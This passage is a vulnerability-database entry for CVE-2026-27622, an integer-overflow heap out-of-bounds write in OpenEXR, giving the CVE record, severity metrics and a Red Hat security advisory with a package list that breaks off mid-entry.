Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2026-27622 (GCVE-0-2026-27622)
Vulnerability from cvelistv5 – Published: 2026-03-03 22:42 – Updated: 2026-03-11 03:56- CWE-787 - Out-of-bounds Write
| URL | Tags |
|---|---|
| https://github.com/AcademySoftwareFoundation/open… | x_refsource_CONFIRM |
| Vendor | Product | Version | |
|---|---|---|---|
| AcademySoftwareFoundation | openexr |
Affected:
>= 2.3.0, < 3.2.6
Affected: >= 3.3.0, < 3.3.8 Affected: >= 3.4.0, < 3.4.6 |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-27622",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-03-10T00:00:00+00:00",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-03-11T03:56:39.168Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "openexr",
"vendor": "AcademySoftwareFoundation",
"versions": [
{
"status": "affected",
"version": "\u003e= 2.3.0, \u003c 3.2.6"
},
{
"status": "affected",
"version": "\u003e= 3.3.0, \u003c 3.3.8"
},
{
"status": "affected",
"version": "\u003e= 3.4.0, \u003c 3.4.6"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. In CompositeDeepScanLine::readPixels, per-pixel totals are accumulated in vector\u003cunsigned int\u003e total_sizes for attacker-controlled large counts across many parts, total_sizes[ptr] wraps modulo 2^32. overall_sample_count is then derived from wrapped totals and used in samples[channel].resize(overall_sample_count). Decode pointer setup/consumption proceeds with true sample counts, and write operations in core unpack (generic_unpack_deep_pointers) overrun the undersized composite sample buffer. This vulnerability is fixed in v3.2.6, v3.3.8, and v3.4.6."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "LOCAL",
"baseScore": 8.4,
"baseSeverity": "HIGH",
"privilegesRequired": "NONE",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "ACTIVE",
"vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "HIGH"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-787",
"description": "CWE-787: Out-of-bounds Write",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-03-03T22:42:49.086Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-cr4v-6jm6-4963",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-cr4v-6jm6-4963"
}
],
"source": {
"advisory": "GHSA-cr4v-6jm6-4963",
"discovery": "UNKNOWN"
},
"title": "OpenEXR CompositeDeepScanLine integer-overflow leads to heap OOB write"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-27622",
"datePublished": "2026-03-03T22:42:49.086Z",
"dateReserved": "2026-02-20T22:02:30.027Z",
"dateUpdated": "2026-03-11T03:56:39.168Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2026-27622",
"date": "2026-05-16",
"epss": "0.00023",
"percentile": "0.06543"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2026-27622\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-03T23:15:55.737\",\"lastModified\":\"2026-03-05T21:07:05.753\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. In CompositeDeepScanLine::readPixels, per-pixel totals are accumulated in vector\u003cunsigned int\u003e total_sizes for attacker-controlled large counts across many parts, total_sizes[ptr] wraps modulo 2^32. overall_sample_count is then derived from wrapped totals and used in samples[channel].resize(overall_sample_count). Decode pointer setup/consumption proceeds with true sample counts, and write operations in core unpack (generic_unpack_deep_pointers) overrun the undersized composite sample buffer. This vulnerability is fixed in v3.2.6, v3.3.8, and v3.4.6.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":8.4,\"baseSeverity\":\"HIGH\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"ACTIVE\",\"vulnConfidentialityImpact\":\"HIGH\",\"vulnIntegrityImpact\":\"HIGH\",\"vulnAvailabilityImpact\":\"HIGH\",\"subConfidentialityImpact\":\"NONE\",\"subIntegrityImpact\":\"NONE\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"NOT_DEFINED\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}],\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\",\"baseScore\":7.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"REQUIRED\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":1.8,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-787\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:openexr:openexr:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"3.2.6\",\"matchCriteriaId\":\"637078D8-68DE-478F-B304-A08E80A7609C\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:openexr:openexr:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"3.3.0\",\"versionEndExcluding\":\"3.3.8\",\"matchCriteriaId\":\"529003A0-284B-4A1F-B4FF-CABB9A7534B5\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:openexr:openexr:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"3.4.0\",\"versionEndExcluding\":\"3.4.6\",\"matchCriteriaId\":\"44066539-F7B6-415A-AE11-0F80BB8741D7\"}]}]}],\"references\":[{\"url\":\"https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-cr4v-6jm6-4963\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-27622\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-04T16:06:34.211154Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-03-04T16:08:09.596Z\"}}], \"cna\": {\"title\": \"OpenEXR CompositeDeepScanLine integer-overflow leads to heap OOB write\", \"source\": {\"advisory\": \"GHSA-cr4v-6jm6-4963\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 8.4, \"attackVector\": \"LOCAL\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N\", \"userInteraction\": \"ACTIVE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"NONE\", \"subIntegrityImpact\": \"NONE\", \"vulnIntegrityImpact\": \"HIGH\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"HIGH\", \"subConfidentialityImpact\": \"NONE\", \"vulnConfidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"AcademySoftwareFoundation\", \"product\": \"openexr\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= 2.3.0, \u003c 3.2.6\"}, {\"status\": \"affected\", \"version\": \"\u003e= 3.3.0, \u003c 3.3.8\"}, {\"status\": \"affected\", \"version\": \"\u003e= 3.4.0, \u003c 3.4.6\"}]}], \"references\": [{\"url\": \"https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-cr4v-6jm6-4963\", \"name\": \"https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-cr4v-6jm6-4963\", \"tags\": [\"x_refsource_CONFIRM\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. In CompositeDeepScanLine::readPixels, per-pixel totals are accumulated in vector\u003cunsigned int\u003e total_sizes for attacker-controlled large counts across many parts, total_sizes[ptr] wraps modulo 2^32. overall_sample_count is then derived from wrapped totals and used in samples[channel].resize(overall_sample_count). Decode pointer setup/consumption proceeds with true sample counts, and write operations in core unpack (generic_unpack_deep_pointers) overrun the undersized composite sample buffer. This vulnerability is fixed in v3.2.6, v3.3.8, and v3.4.6.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-787\", \"description\": \"CWE-787: Out-of-bounds Write\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-03-03T22:42:49.086Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2026-27622\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-03-11T03:56:39.168Z\", \"dateReserved\": \"2026-02-20T22:02:30.027Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-03-03T22:42:49.086Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
RHSA-2026:8869
Vulnerability from csaf_redhat - Published: 2026-04-20 02:23 - Updated: 2026-05-14 22:36A flaw was found in OpenEXR, an image storage format library for the motion picture industry. An attacker can craft a malicious EXR file that, when processed, causes an integer overflow in the `CompositeDeepScanLine::readPixels` function. This overflow leads to an undersized buffer allocation, which can then be overrun during write operations. Successful exploitation could result in arbitrary code execution or a denial of service (DoS).
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: AppStream-9.2.0.Z.E4S:openexr-0:3.1.1-2.el9_2.2.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.2.0.Z.E4S:openexr-0:3.1.1-2.el9_2.2.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.2.0.Z.E4S:openexr-0:3.1.1-2.el9_2.2.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.2.0.Z.E4S:openexr-0:3.1.1-2.el9_2.2.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.2.0.Z.E4S:openexr-0:3.1.1-2.el9_2.2.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.2.0.Z.E4S:openexr-debuginfo-0:3.1.1-2.el9_2.2.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.2.0.Z.E4S:openexr-debuginfo-0:3.1.1-2.el9_2.2.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.2.0.Z.E4S:openexr-debuginfo-0:3.1.1-2.el9_2.2.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.2.0.Z.E4S:openexr-debuginfo-0:3.1.1-2.el9_2.2.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.2.0.Z.E4S:openexr-debuginfo-0:3.1.1-2.el9_2.2.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.2.0.Z.E4S:openexr-debugsource-0:3.1.1-2.el9_2.2.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.2.0.Z.E4S:openexr-debugsource-0:3.1.1-2.el9_2.2.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.2.0.Z.E4S:openexr-debugsource-0:3.1.1-2.el9_2.2.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.2.0.Z.E4S:openexr-debugsource-0:3.1.1-2.el9_2.2.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.2.0.Z.E4S:openexr-debugsource-0:3.1.1-2.el9_2.2.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.2.0.Z.E4S:openexr-libs-0:3.1.1-2.el9_2.2.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.2.0.Z.E4S:openexr-libs-0:3.1.1-2.el9_2.2.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.2.0.Z.E4S:openexr-libs-0:3.1.1-2.el9_2.2.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.2.0.Z.E4S:openexr-libs-0:3.1.1-2.el9_2.2.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.2.0.Z.E4S:openexr-libs-0:3.1.1-2.el9_2.2.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.2.0.Z.E4S:openexr-libs-debuginfo-0:3.1.1-2.el9_2.2.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.2.0.Z.E4S:openexr-libs-debuginfo-0:3.1.1-2.el9_2.2.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.2.0.Z.E4S:openexr-libs-debuginfo-0:3.1.1-2.el9_2.2.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.2.0.Z.E4S:openexr-libs-debuginfo-0:3.1.1-2.el9_2.2.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.2.0.Z.E4S:openexr-libs-debuginfo-0:3.1.1-2.el9_2.2.x86_64 | — |
Vendor Fix
fix
Workaround
|
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update for openexr is now available for Red Hat Enterprise Linux 9.2 Update Services for SAP Solutions.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "OpenEXR is an open-source high-dynamic-range floating-point image file format for high-quality image processing and storage. This document presents a brief overview of OpenEXR and explains concepts that are specific to this format. This package containes the binaries for OpenEXR.\n\nSecurity Fix(es):\n\n* openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing (CVE-2026-27622)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:8869",
"url": "https://access.redhat.com/errata/RHSA-2026:8869"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "2444251",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444251"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_8869.json"
}
],
"title": "Red Hat Security Advisory: openexr security update",
"tracking": {
"current_release_date": "2026-05-14T22:36:31+00:00",
"generator": {
"date": "2026-05-14T22:36:31+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.8.0"
}
},
"id": "RHSA-2026:8869",
"initial_release_date": "2026-04-20T02:23:59+00:00",
"revision_history": [
{
"date": "2026-04-20T02:23:59+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-04-20T02:23:59+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-05-14T22:36:31+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux AppStream E4S (v.9.2)",
"product": {
"name": "Red Hat Enterprise Linux AppStream E4S (v.9.2)",
"product_id": "AppStream-9.2.0.Z.E4S",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:rhel_e4s:9.2::appstream"
}
}
}
],
"category": "product_family",
"name": "Red Hat Enterprise Linux"
},
{
"branches": [
{
"category": "product_version",
"name": "openexr-0:3.1.1-2.el9_2.2.src",
"product": {
"name": "openexr-0:3.1.1-2.el9_2.2.src",
"product_id": "openexr-0:3.1.1-2.el9_2.2.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr@3.1.1-2.el9_2.2?arch=src"
}
}
}
],
"category": "architecture",
"name": "src"
},
{
"branches": [
{
"category": "product_version",
"name": "openexr-0:3.1.1-2.el9_2.2.aarch64",
"product": {
"name": "openexr-0:3.1.1-2.el9_2.2.aarch64",
"product_id": "openexr-0:3.1.1-2.el9_2.2.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr@3.1.1-2.el9_2.2?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "openexr-libs-0:3.1.1-2.el9_2.2.aarch64",
"product": {
"name": "openexr-libs-0:3.1.1-2.el9_2.2.aarch64",
"product_id": "openexr-libs-0:3.1.1-2.el9_2.2.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-libs@3.1.1-2.el9_2.2?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "openexr-debugsource-0:3.1.1-2.el9_2.2.aarch64",
"product": {
"name": "openexr-debugsource-0:3.1.1-2.el9_2.2.aarch64",
"product_id": "openexr-debugsource-0:3.1.1-2.el9_2.2.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-debugsource@3.1.1-2.el9_2.2?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "openexr-debuginfo-0:3.1.1-2.el9_2.2.aarch64",
"product": {
"name": "openexr-debuginfo-0:3.1.1-2.el9_2.2.aarch64",
"product_id": "openexr-debuginfo-0:3.1.1-2.el9_2.2.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-debuginfo@3.1.1-2.el9_2.2?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "openexr-libs-debuginfo-0:3.1.1-2.el9_2.2.aarch64",
"product": {
"name": "openexr-libs-debuginfo-0:3.1.1-2.el9_2.2.aarch64",
"product_id": "openexr-libs-debuginfo-0:3.1.1-2.el9_2.2.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-libs-debuginfo@3.1.1-2.el9_2.2?arch=aarch64"
}
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "openexr-0:3.1.1-2.el9_2.2.ppc64le",
"product": {
"name": "openexr-0:3.1.1-2.el9_2.2.ppc64le",
"product_id": "openexr-0:3.1.1-2.el9_2.2.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr@3.1.1-2.el9_2.2?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "openexr-libs-0:3.1.1-2.el9_2.2.ppc64le",
"product": {
"name": "openexr-libs-0:3.1.1-2.el9_2.2.ppc64le",
"product_id": "openexr-libs-0:3.1.1-2.el9_2.2.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-libs@3.1.1-2.el9_2.2?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "openexr-debugsource-0:3.1.1-2.el9_2.2.ppc64le",
"product": {
"name": "openexr-debugsource-0:3.1.1-2.el9_2.2.ppc64le",
"product_id": "openexr-debugsource-0:3.1.1-2.el9_2.2.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-debugsource@3.1.1-2.el9_2.2?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "openexr-debuginfo-0:3.1.1-2.el9_2.2.ppc64le",
"product": {
"name": "openexr-debuginfo-0:3.1.1-2.el9_2.2.ppc64le",
"product_id": "openexr-debuginfo-0:3.1.1-2.el9_2.2.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-debuginfo@3.1.1-2.el9_2.2?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "openexr-libs-debuginfo-0:3.1.1-2.el9_2.2.ppc64le",
"product": {
"name": "openexr-libs-debuginfo-0:3.1.1-2.el9_2.2.ppc64le",
"product_id": "openexr-libs-debuginfo-0:3.1.1-2.el9_2.2.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-libs-debuginfo@3.1.1-2.el9_2.2?arch=ppc64le"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "openexr-0:3.1.1-2.el9_2.2.x86_64",
"product": {
"name": "openexr-0:3.1.1-2.el9_2.2.x86_64",
"product_id": "openexr-0:3.1.1-2.el9_2.2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr@3.1.1-2.el9_2.2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "openexr-libs-0:3.1.1-2.el9_2.2.x86_64",
"product": {
"name": "openexr-libs-0:3.1.1-2.el9_2.2.x86_64",
"product_id": "openexr-libs-0:3.1.1-2.el9_2.2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-libs@3.1.1-2.el9_2.2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "openexr-debugsource-0:3.1.1-2.el9_2.2.x86_64",
"product": {
"name": "openexr-debugsource-0:3.1.1-2.el9_2.2.x86_64",
"product_id": "openexr-debugsource-0:3.1.1-2.el9_2.2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-debugsource@3.1.1-2.el9_2.2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "openexr-debuginfo-0:3.1.1-2.el9_2.2.x86_64",
"product": {
"name": "openexr-debuginfo-0:3.1.1-2.el9_2.2.x86_64",
"product_id": "openexr-debuginfo-0:3.1.1-2.el9_2.2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-debuginfo@3.1.1-2.el9_2.2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "openexr-libs-debuginfo-0:3.1.1-2.el9_2.2.x86_64",
"product": {
"name": "openexr-libs-debuginfo-0:3.1.1-2.el9_2.2.x86_64",
"product_id": "openexr-libs-debuginfo-0:3.1.1-2.el9_2.2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-libs-debuginfo@3.1.1-2.el9_2.2?arch=x86_64"
}
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_version",
"name": "openexr-libs-0:3.1.1-2.el9_2.2.i686",
"product": {
"name": "openexr-libs-0:3.1.1-2.el9_2.2.i686",
"product_id": "openexr-libs-0:3.1.1-2.el9_2.2.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-libs@3.1.1-2.el9_2.2?arch=i686"
}
}
},
{
"category": "product_version",
"name": "openexr-debugsource-0:3.1.1-2.el9_2.2.i686",
"product": {
"name": "openexr-debugsource-0:3.1.1-2.el9_2.2.i686",
"product_id": "openexr-debugsource-0:3.1.1-2.el9_2.2.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-debugsource@3.1.1-2.el9_2.2?arch=i686"
}
}
},
{
"category": "product_version",
"name": "openexr-debuginfo-0:3.1.1-2.el9_2.2.i686",
"product": {
"name": "openexr-debuginfo-0:3.1.1-2.el9_2.2.i686",
"product_id": "openexr-debuginfo-0:3.1.1-2.el9_2.2.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-debuginfo@3.1.1-2.el9_2.2?arch=i686"
}
}
},
{
"category": "product_version",
"name": "openexr-libs-debuginfo-0:3.1.1-2.el9_2.2.i686",
"product": {
"name": "openexr-libs-debuginfo-0:3.1.1-2.el9_2.2.i686",
"product_id": "openexr-libs-debuginfo-0:3.1.1-2.el9_2.2.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-libs-debuginfo@3.1.1-2.el9_2.2?arch=i686"
}
}
}
],
"category": "architecture",
"name": "i686"
},
{
"branches": [
{
"category": "product_version",
"name": "openexr-0:3.1.1-2.el9_2.2.s390x",
"product": {
"name": "openexr-0:3.1.1-2.el9_2.2.s390x",
"product_id": "openexr-0:3.1.1-2.el9_2.2.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr@3.1.1-2.el9_2.2?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "openexr-libs-0:3.1.1-2.el9_2.2.s390x",
"product": {
"name": "openexr-libs-0:3.1.1-2.el9_2.2.s390x",
"product_id": "openexr-libs-0:3.1.1-2.el9_2.2.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-libs@3.1.1-2.el9_2.2?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "openexr-debugsource-0:3.1.1-2.el9_2.2.s390x",
"product": {
"name": "openexr-debugsource-0:3.1.1-2.el9_2.2.s390x",
"product_id": "openexr-debugsource-0:3.1.1-2.el9_2.2.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-debugsource@3.1.1-2.el9_2.2?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "openexr-debuginfo-0:3.1.1-2.el9_2.2.s390x",
"product": {
"name": "openexr-debuginfo-0:3.1.1-2.el9_2.2.s390x",
"product_id": "openexr-debuginfo-0:3.1.1-2.el9_2.2.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-debuginfo@3.1.1-2.el9_2.2?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "openexr-libs-debuginfo-0:3.1.1-2.el9_2.2.s390x",
"product": {
"name": "openexr-libs-debuginfo-0:3.1.1-2.el9_2.2.s390x",
